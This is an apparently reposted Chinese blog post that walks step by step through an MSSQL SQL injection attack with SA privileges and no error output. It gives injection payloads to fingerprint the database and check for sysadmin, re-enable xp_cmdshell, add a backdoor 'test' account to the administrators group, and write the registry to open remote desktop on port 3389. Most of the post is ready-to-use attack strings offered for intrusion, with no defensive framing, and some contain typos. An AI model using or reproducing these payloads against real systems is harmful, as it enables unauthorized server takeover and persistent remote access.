MSSQL注入SA权限不显错模式下的入侵

Posted 安全界 的彭于晏

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了MSSQL注入SA权限不显错模式下的入侵相关的知识,希望对你有一定的参考价值。

第一步判断是不是微软的sqlserver 数据库
and exists (select * from %20 sysobjects )
第二步查询当前数据库系统用户
and system_user=0
第三步检查权限是否为SA
and 1 =(slect IS_SRVROLEMEMBER(‘sysadmin’))
第四步判断一下xp_cmdshell 存储过程是否存在
and 1=(select count (*) from master.dbo.sysobjects where name = ‘xp_cmdshell’)
xp_cmdshell 扩展存储过程将命令字符串作为操作系统命令 shell 执行,并以文本行的形式返回所有输出。
默认不存在恢复xp_cmdshell
EXEC sp_configure ‘show advanced options’, 1;RECONFIGURE;EXEC sp_configure ‘xp_cmdshell’, 1;RECONFIGURE;–
第五步执行xp_cmdshell 扩展存储添加账号
;exec master…xp_cmdshell ‘net user test test /add’
把添加的账号添加到管理员组
;exec master…xp_cmdshell ‘net localgroup administrator test /add’
开启远程3389
;exec master.dbo.xp_regwrite’HKEY_LOCAL_MACHINE’,‘SYSTEM\\CurrentControlSet\\Control\\Terminal Server’,‘fDenyTSConnections’,‘REG_DWORD’,0;–

以上是关于MSSQL注入SA权限不显错模式下的入侵的主要内容,如果未能解决你的问题,请参考以下文章

学习笔记 MSSQL显错手工注入

网络安全从入门到精通 (第五章-3) MSSQL反弹注入

Asp SQL注入获取某服务器权限

sql注入显错注入-GET

当得知对方存在MSSQL注入且得到对方用户名数据库名和权限怎么进行下一步入侵?

挖洞入门_显错型SQL注入